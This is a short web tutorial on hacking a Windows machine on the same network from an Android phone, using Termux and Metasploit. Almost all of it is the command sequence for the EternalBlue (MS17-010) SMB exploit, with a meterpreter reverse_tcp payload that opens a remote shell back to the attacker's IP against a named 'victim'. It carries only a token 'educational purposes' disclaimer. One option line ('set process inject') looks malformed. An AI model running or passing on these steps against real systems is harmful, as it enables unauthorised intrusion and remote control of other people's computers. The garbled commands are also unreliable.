How to hack Windows from an Android Phone

How to hack Windows from an Android Phone

Disclaimer: Everything on this site is for educational purposes and should not be used for evil.

Note: You can only hack devices with an internal IP (Devices that are connected to your network)

You will need:

Termux
Your IP
Victim's IP
Metasploit

Tutorial:

Execute these commands:
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
If your victim has a 32-bit system, type:
set process inject wlms.exe
If you victim has a 64-bit system, type:
set process inject lsass.exe
Then execute these commands:

set payload windows/x64/meterpreter/reverse_tcp
set rhost [Victim's IP]
set lhost [Your IP]
exploit

Comments